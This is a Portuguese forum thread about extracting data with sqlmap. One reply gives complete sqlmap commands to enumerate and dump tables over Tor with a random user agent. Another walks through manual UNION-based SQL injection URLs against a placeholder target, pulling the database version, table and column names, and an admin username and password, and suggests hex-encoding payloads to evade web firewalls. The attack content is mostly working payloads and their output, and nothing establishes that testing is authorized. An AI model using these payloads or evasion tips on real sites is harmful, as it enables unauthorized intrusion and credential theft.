SQLMAP - Dificuldades em fazer Download de Itens.

1. SQLMAP - Dificuldades em fazer Download de Itens.

Vinicius Castanho
ViniCastanho

(usa Outra)

Enviado em 19/05/2016 - 19:26h

Olá.
Estou tentando seguir algumas dicas de injection dentro de sites testes mais estou com dificuldade em fazer download de arquivos dentro do mesmos

comandos executados:

cd /pentest/database/sqlmap

root@bt:/pentest/database/sqlmap# python sqlmap.py -u [site] --tables


root@bt:/pentest/database/sqlmap# python sqlmap.py -u [site] -T [caminho] --columns


RESUMINDO...

As informações que me aparecem após dar o comando final ....... --columns

Eu gostaria de saber como é o comando correto para fazer o download das opções para dentro da pasta Desktop.

vi algumas pessoas falando de "wget" mais acredito que wget seja usado quando se tem o caminho: www.algumacoisa.com/algumacoisa....


Alguém pode me ajudar?






  


2. Re: SQLMAP - Dificuldades em fazer Download de Itens.

Perfil removido
removido

(usa Nenhuma)

Enviado em 19/05/2016 - 20:42h

Sintaxe demonstrativa:
# python sqlmap.py --url target.com --tor --random-agent --dbms=mysql --technique=U -D database --tables
tabela1
tabela2
tabela3

# python sqlmap.py --url target.com --tor --random-agent --dbms=mysql --technique=U -D database -T tabela1 --columns
coluna1
coluna2
coluna3

# python sqlmap.py --url target.com --tor --random-agent --dbms=mysql --technique=U -D database -T tabela1 -C coluna1,coluna2,coluna3 --dump

Opções:
--tor (faz os http requests atráves da rede onion)
--random-agent (User-agent random)
--dbms (Only MySQL Server)
--technique (Only Union Based query)
-D (Database)
-T (tables)
-C (Columns)
--dump (Copia os dados para o diretório de output do sqlmap)

Material para estudo: https://github.com/sqlmapproject/sqlmap/wiki/Usage
# python sqlmap.py --help
--
Just bring us some beers, and then we can talk about our systems. :)



3. Obrigado!

Vinicius Castanho
ViniCastanho

(usa Outra)

Enviado em 21/05/2016 - 19:45h

Obrigado Cristhoffer94, agradeço pela ajuda amigo.


4. Re: SQLMAP - Dificuldades em fazer Download de Itens.

Perfil removido
removido

(usa Nenhuma)

Enviado em 21/05/2016 - 21:03h

Também é possível fazer a injeção manual usando a opção --sql-query do sqlmap ou em programas que fazem http requests como nevegadores e outros.

Vou exemplificar uma injeção usando Union Based e alguns operadores SQL, que pode servir de base para os seus estudos (neste exemplo o servidor vulnerável usa MySQL e PHP e permite o uso de queries union based).

Extraindo versão do MySQL:
target.com/vuln.php?id=NULL+union+all+select+1,version(),3,4--
1
5.6.21
3
4

Como você pode observer, temos quatro colunas onde poderemos extrair os dados, na segunda coluna a versão do MySQL Server (após a versão 5 do MySQL, conta com o information_schema que registra a estrutura da database, nas versões anteriores para exploitar usando Union based era no método true/false, chutando o nome das tabelas e colunas).

Algumas informações:
target.com/vuln.php?id=NULL+union+all+select+1,concat(user(),0x3a,database()),3,4--
1
user:databasevuln
3
4


Extraindo tabelas:
target.com/vuln.php?id=NULL+union+all+select+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema='databasevuln'--
tabela1
admin
tabela3
tabela4


Extraindo colunas da tabela:
target.com/vuln.php?id=NULL+union+all+select+1,concat(column_name),4+from+information_schema.columns+where+table_schema='databasevuln'+and+table_name='admin'--+
coluna1
id
username
password
email
logindate
coluna3
coluna4


Extraindo os dados:
target.com/vuln.php?id=NULL+union+all+select+1,concat(username,0x3a,password),4+from+admin--
coluna1
admin:hackme
coluna3
coluna4


Observação:
Dependendo do código vulnerável no script, nem sempre será possível fazer as injeções com Union Based, portanto não se limite apenas à isso.
Nem sempre as queries serão aceitas, atualmente existem web firewalls que bloqueiam certos tipos de requests, um método de bypass é criptografar todo o payload em hexadecimal.
A injeção de SQL pode ser feita em qualquer script web que utilize SQL, também em qualquer outra linguagem que trabalhe com SQL.
Em alguns casos é necessário verificar tabela por tabela, coluna por coluna, com o operador "limit".

Bons estudos!
[]'s
--
Just bring us some beers, and then we can talk about our systems. :)







Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts